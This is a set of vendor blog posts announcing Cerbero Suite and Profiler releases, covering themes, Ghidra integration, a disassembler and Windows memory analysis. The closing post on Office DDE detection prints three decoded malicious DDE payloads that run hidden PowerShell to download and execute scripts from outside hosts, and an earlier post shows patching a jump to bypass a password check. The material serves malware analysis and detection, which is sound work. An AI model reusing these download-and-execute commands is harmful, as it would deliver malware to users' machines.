Cerbero Suite 3.4 is out!

We’re happy to announce the release of Cerbero Suite 3.4!

This release comes with tons of improvements:

– added script editor for Python and JavaScript
– added Python editor workspace
– added Python snippet action
– added Mariana theme
– improved deployment on OS X
+ improved Ghidra native UI
– improved filters
– improved hex workspace
– improved JS debugger
– improved Monokai theme
+ updated Ghidra support to 9.1-BETA
– fixed Header Manager crash due to themes
– fixed some bugs

As you can see from the screen-shots in this post, we have introduced the Mariana theme. I think it’s even easier on the eyes, than the Monokai one.

The Ghidra native UI is now compatible with the latest 9.1-BETA and has been further improved!

Deployment on OS X has been greatly improved by removing the external Python dependency. Just as in the Windows and Linux version, the OS X version now embeds Python.

Also interesting for OS X users: a new instance of Cerbero can be spawned from anywhere in the program by pressing Ctrl+Alt+N (or by clicking the relative toolbar button). This works on other platforms as well, but on OS X it’s especially useful.

The main new feature is the introduction of a script editor for Python and JavaScript. You can open as many editor as you like in a single workspace by running the relative action (or in the case of the Python editor by clicking on on the toolbar button).

Script editors are intended to make writing scripts and executing them extremely fast. They provide a simple mechanism to save scripts and open them by just setting the name of the script. The JavaScript editor also offers a debugging shortcut.

To make the writing of scripts even easier, there’s a new action to insert a Python code snippet.

You can choose from a selection of useful snippets.

This is especially useful to avoid looking up the SDK even for simple things and in time the selection of snippets will grow.

We also improved and added new misc filters.

I personally played many CTFs using Cerbero Suite before working on this release and the improvements are directly related to that. I hope that our users will enjoy these improvements as much as we do!

Happy hacking!

Cerbero Suite 3.3 is out!

We’re happy to announce the release of Cerbero Suite 3.3!

While the most anticipated feature may have been theme support, there’s much more:

added theme support
added MachO Carbon loader
added Monokai theme
improved Ghidra native UI
– improved disassembly view
made Windows XP compatible
– fixed some bugs

Improved Ghidra native UI

Apart from themes, most of the work went into improving the Ghidra native UI. Specifically we improved navigation, added comments in the decompiler, added support for renaming variables and parameters both in the disassembly and the decompiler, improved cross references, added make code / undefine commands, added status updates, fixed bugs.

Also, if you’d like to run Ghidra and the native UI on two different machines, just open the install.pdf in util/ghidra.zip to learn how. 🙂

Carbon: MachO loader

We also added support for x86/x64 MachO files in Carbon!

XP compatibility

Cerbero can now run on Windows XP.

Everything is working apart from the Python ssl module (we might provide support for it in the future). So if you need a malware triage tool or just a Python3 interpreter on XP, you can use Cerbero. 🙂

Happy hacking!

Theme support

The upcoming 3.3 version of Cerbero features theme support. I decided to add this, because I received multiple requests on Twitter and especially took into consideration the fact that some people have difficulty with bright colors because of their eyesight.

Here’s a preview of my Monokai theme for Cerbero:

More themes will be added in time and you can even create your own or customize existing ones.

Adding theme support in Cerbero took more than a week of work, because of the many custom controls it has and that’s also why I have postponed it for a lot of time. But since I decided to do it, I tried to do it properly.

Cerbero uses Qt as UI library and, as many of you know, Qt can be skinned via CSS stylesheets. However, Cerbero has not only many custom controls, but its own UI SDK which isn’t bound to Qt. So a theme needs to take into consideration those colors as well.

Let’s take a look at a snippet of the Monokai theme:

The style entry determines the Qt style to use for this theme. If not specified, the default style will be used. The stylesheet entry contains the CSS. The other entries represent custom colors.

Since Carbon comes with its own set of themes, the “themes” directory contains a sub-directory named “carbon” which contains them.

If you want to create your own themes or customize an existing one, you can create a new theme in your user theme directory, which can easily be opened from the settings:

If you don’t want to create an entirely new theme, what you can do is to inherit from an existing one. To do that just create a new theme specifying its inheritance:

While all specified entries will simply replace existing entries, the stylesheet one is special, because it will be appended to the inherited stylesheet. In this case we created a theme that does nothing else than to increase the padding in tab bar buttons.

In the same way we can customize individual colors. The inheritance of themes works up to a depth of 5, so you can inherit from a theme which already inherits from another theme.

I hope you like it! 🙂

Cerbero Suite 3.2 is out!

This is a rather unusual release and as you can see the change-list is short:

+ added experimental native UI for Ghidra
+ improved disassembly speed
– fixed SSL on Linux

The main addition in version 3.2 is an experimental native UI for Ghidra. Here are a few screen-shots on all supported platforms.

Windows:

Linux:

OS X:

Since this experimental UI has been more of a personal project, I discussed it in more depth on my blog.

As this is a proof of concept, it will be of fundamental importance whether or not you, the user, want this project to mature. Feedback is highly appreciated and will be taken into consideration in order to prioritize this feature and decide how much time to invest into it. Even curses are considered valuable feedback! 🙂

Supporting Ghidra has already had its benefits even considering other features. In fact, in version 3.2 the disassembly view of Carbon has been made faster as a positive side-effect. More of these benefits are about to come as we’re preparing a lot of cool new additions for the upcoming releases. 🙂

Happy hacking!

Cerbero Suite 3.1 is out!

Version 3.1 is out with many improvements! The main news is the support in Carbon for ELF files and the improved deployment of the Linux edition.

This is the full list of news:

+ added ELF Carbon loader
+ added edit bytes command to Carbon
+ added write method to Carbon
+ added detection of 16-bits wide strings in Carbon
+ added open in hex editor action in Carbon
+ added filters to Carbon
+ added Carbon Monokai theme
added single view mode (Ctrl+Alt+S)
improved deployment on Linux
+ improved x86/x64 disassembly
improved hex workspace
– updated capstone to 4.0.1
– fixed misidentified object crash
– fixed some bugs

Carbon: ELF loader

Here we can see an ELF x64 file in Carbon. As we can see we have an entry point with a call to __libc_start_main.

We can follow the first argument which will bring us to the main function.

Carbon: detection of 16-bits wide strings

Simple 16-bit wide strings are now automatically detected in Carbon.

Carbon: open in hex editor action

It is now possible to open the hex editor from the disassembly. To demonstrate this feature I crafted a small executable which asks for a password and prints an error message if the password is wrong.

We can easily find the “wrong password” string in Carbon by pressing Ctrl+5.

Right before the referenced string, there’s a scanf followed by a strcmp.

We go to the jne which evaluates the result of the strcmp and we open the hex editor from the contextual menu. It will ask us to open a file (it must be a copy of the file we’re analysing).

We can just nop the two bytes representing the jne and then we save the file.

Whatever password we insert now, it will be accepted.

Carbon: filters

While filters are already accessible from hex views, it is now possible to access them from Carbon as well.

Let’s take the same sample analyzed in the previous blog post with xored strings. We select on of those xored strings and we open the filters from the contextual menu or by pressing Ctrl+T.

We can now test out a filter on the selected bytes. In this case we simply use a xor to see the string in plain.

Carbon: Monokai theme

The Monokai theme has been added to Carbon.

I have been using this theme for some development projects and wondered what it would look like in a disassembly. I don’t know about you, but I like it… 🙂

Single-view mode

While it has always been possible to trigger the full-screen mode via Ctrl+Alt+F, now there’s also single-view mode which can be triggered via Ctrl+Alt+S.

What it does is to hide all other views, leaving only the focused view open. Press the same shortcut to exit the mode and have all other views visible again.

Improved Linux deployment

The Linux edition has been drastically improved by simplifying its deployment. As a result it should now be compatible with many more versions of Linux, without having to adjust dependencies. It also comes with a built-in Python distribution, just like the Windows edition.

Carbon: improved x86/x64 disassembly

The disassembly in Carbon has been improved so that it now shows import forward calls. Let’s take this simple call to __crtTerminateProcess.

If we follow the call, we’ll see that it just calls a jumps which in turn jumps to the actual API.

These sort of calls to jumps or jumps to jumps are now automatically resolved to improve the readability of the code.

Improved hex workspace

The hex workspace comes with a number of small improvements, but mainly the initial layout doesn’t show the output view by default.

We hope you enjoy this version as we’re already working on the next one and I can’t wait to show you some of the cool things we’re working on. 🙂

Happy hacking!

Cerbero Suite 3.0 is out!

We’re proud to announce the release of the new 3.0 version of Cerbero Suite!

The main news for the advanced version is the introduction of the Carbon Interactive Disassembler and of a full-fledged hex-editor, while the standard version features only the hex-editor.

We have removed the nag-screen from our trial, making ours the most permissive trial of all time. 🙂 Truth is, I have never been a fan of software protections, as they degrade the experience for every user, including customers and limit the immediacy of application of the software when needed.

We live in a time with virtual machines and it’s often necessary to install something on the fly and use it right away. That’s also why we included a local Python distribution in our installer on Windows, so that users are no longer required to separately install Python and configure it in our software, but can use all the functionality right away after a quick installation process.

While we changed the prices of our commercial licenses, we kept basically unchanged prices for personal licenses. Also, for a week starting today all personal licenses are sold at a discount, so hurry up! 😉

All of our customers can upgrade at a 50% discount their licenses for the next 3 months. Not only that, for the same period of time, customers of the 2.x series can purchase new licenses at a 50% discount! If you want to upgrade or purchase a new license at a discount, please contact us at sales@icerbero.com.

As usual our licenses will be valid for the whole duration of the 3.x series. Because of this licensing scheme we offer even bigger discounts to anyone who bought a license in the last two months. Please contact us at sales@icerbero.com to get a precise renewal quote.

This is the full list of news for the 3.0 version:

+ added Carbon interactive disassembler
added hex editing workspace
– added command line workspace
+ added Windows DMP format support
+ added Windows Hibernation files format support
added undo capability in hex views
– exposed workspaces to Python
– improved appearance on high resolution displays
– improved support for SQLite files
+ improved support for EML files
– included local python on Windows

(Note: entries with the ‘+’ sign apply only to the advanced edition.)

As we want to share our road-map with our users, in the next releases we’ll:

– Improve some of the rough edges still present in Carbon.
– Continue working on our x86/x64 analysis.
– Add loaders for ELF and Mach-O.
– Start working on creating signatures for library functions.
– Improve code analysis for memory images.
– Further improve memory analysis.
– Start working on analysis for ARM. This, however, may take a while.

Have a great day and happy hacking! 😉

Windows DMP and Hibernation Files

As we’re closing in on the release date of version 3.0, it’s time to announce some more new features: the advanced edition will come with support for Windows DMP and Windows Hibernation files.

There are many internal formats of Windows DMP files and Cerbero now supports all of the most common ones. Here are for instance some screen-shots showing information contained in minidumps.

Of course, when the full memory snapshot is available, it is possible to explore it as if it was a raw memory image. Here we can see address space inspection performed on a DMP file.

Hibernation files are also supported for all Windows version from XP to Win10. Here we can see memory analysis performed on Hibernation files.

Stay tuned as there’s more to come also regarding memory analysis.

Profiler 2.9.2 – Windows 10 Heap

The version 2.9.2 of Profiler is out with two improvements. The first one, is more or less a rewrite of the CCITTFax decoder for PDFs, which has now been tested against more samples.

The second improvement is the addition of support for the new heap introduced in Windows 10.

This removes the limitation mentioned previously of heap parsing regarding certain Windows 10 processes such as: smss.exe, csrss.exe, services.exe, lsass.exe, svchost.exe, MicrosoftEdgeC, etc.

As with the older NT heap we use an aggressive approach to rebuild the Windows 10 heap as best as we can even if there are missing pages.

The schema below shows the number of chunks found using an aggressive approach versus a soft one in a Win10 x64 image.

Profiler 2.9

Profiler 2.9.1 is out with the following news (entries with the plus sign apply only to the advanced edition):

+ added parsing of Windows heap
+ added file detection in memory regions and heap
+ added file detection in memory regions and heap via libmagic
added CCITTFax decoder for PDFs
added detection of DDE field codes
added support for 64-bit shellcode to executable
+ added display of page flags in hex views
added actions for text modification
added action to dump mapped PEs to disk
+ added signature for automatic recognition of EML files
+ improved identification speed of raw Windows memory images
+ improved loading speed of raw Windows memory images
+ improved scanning speed of memory images
+ improved global address space hex view
+ improved user address space view
improved fault tolerance of the XML parser
– improved CFBF support
– improved support of embedded OLE objects
– improved extraction of VBA code
– improved PDF decryption
– updated SQLite to 3.21.0
– updated libmagic to 5.32
– fixed XML to text action
– fixed Python multithreading issues
– fixed many small issues
– removed PasteBin action

We’ve waited for the official announcement of the new release, because we wanted to pack some more features inside 2.9.1!

After this edition, we will continue to release minor versions, while preparing a major 3.0 edition scheduled for the second half of this year.

Windows memory image identification speed

One of the main things we improved in 2.9 is the speed of opening memory images. The user has now the option whether or not to scan files in memory. Most of the times scanning files in memory is not needed and makes the opening of a memory image unnecessarily slow.

Version 2.9.1 comes with an additional very important speed improvement: the options dialog will pop up at the first occurrence of a valid KDBG structure. The user can still opt to look for additional KDBG structures as highlighted in the screenshot below.

Memory file detection via libmagic

The main addition in version 2.9.1 versus 2.9.0 is the capability to increase the file detection rate of files in memory using libmagic.

We can dump all files detected to disk as well.

While libmagic increases the detection rate, it also adds many false positive. A nice effect of using libmagic is the detection of text files and scripts.

Memory page flags

Page flags are now visible in the hex view for memory images. Not only when viewing the main address space of a process, but also when opening a mapped file.

Or the structures of a mapped file.

Or any children or resource of a mapped file.

Improved user space view

The user space view for every process now shows also the list of mapped modules.

Dump PE to disk

When inspecting a memory mapped executable, we can now dump the file to disk and Profiler will take care of adjusting the PE header in order to be able to inspect the file using external tools as well.

XML fault tolerance

The XML parser has been improved to handle incorrect XML files. This is especially important when handling PDF malware which contains malformed XDP data.

CCITTFax decoder

Yet another decoder has been added to our PDF support. Here we can see a malware sample using this codec to conceal some JavaScript code.

64-bit shellcode to executable

It is now possible to convert x64 shellcode to executable. In the past this feature was limited to x86 shellcode.

To handle x64 shellcode it is necessary to specify “AMD x64” as Machine.

Text modification actions

When being in the context of a text editor, we can now use text actions to do some basic text operations like converting text to lowercase or uppercase or removing spaces.

Enjoy!

Microsoft Office DDE Detection

In this article we’re not going to discuss how DDE works, there are plenty of excellent resources about this topic already (also here and here).

Instead we’re going to see how to inspect DDE field codes in Profiler. In fact, the upcoming 2.9 version of Profiler comes with detection of DDE field codes.

So let’s start by opening a modern Word document (.docx).

We can see that the main document.xml is highlighted as malicious. If we open the file, we’ll see that Profiler informs us about a possible DDE attack.

The actual DDE code is spread among the XML and makes it difficult for us to read.

So let’s use two actions to clean it up. Press Ctrl+R to execute the XML->To text action.

Followed by the Text->Strip one.

Once done, we’ll obtain the following text:

DDEAUTO c:\ \Windows\ \ System32\ \ cmd.exe “/ k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString( ‘ http://ec2-54-158-67-5.compute-1.amazonaws.com/CCA/ DDE 2 .ps1’);powershell -e $e ” !Unexpected End of Formula

Which is pretty clear: it downloads a PowerShell script from a URL and then executes it.

Now let’s look at an old-school Word document (.doc).

In this case it’s even easier for us to inspect the DDE code as clicking on the threat immediately brings us to it.

By copying the ascii text from the hex view or executing the Conversion->Bytes to text action we’ll obtain the following code:

DDEAUTO c:\\Windows\\System32\\cmd.exe “/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source “https://www.dropbox.com/s/or2llvdmli1bw4o/index.js?dl=1” -Destination “index.js” & start c:\\Windows\\System32\\cmd.exe /c cscript.exe index.js”

Which downloads a Windows JS script and executes it.

Now let’s go back to a modern office sample. In this particular case the DDE code is obfuscated as explained in two of the articles linked in the beginning.

The XML is full of this QUOTE-followed-by-decimal-numbers syntax.

Since the strings are inside XML attributes, we can’t use the XML->To text action. Instead, we just clean it up manually as there are only 3 of these QUOTES.

Out of this, we can make a small Python script to convert the numbers to a hex string and print it out to the console:

Then we simply select the hex string and run the action Conversion->Hex string to bytes.

And now we can see the decoded bytes in hex view.

This is the DDE code:

C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://netmediaresources.com/config.txt’);powershell -enc $e #a slow internet connectiontry again later

Yet again it downloads a PowerShell script and executes it.

Pretty simple!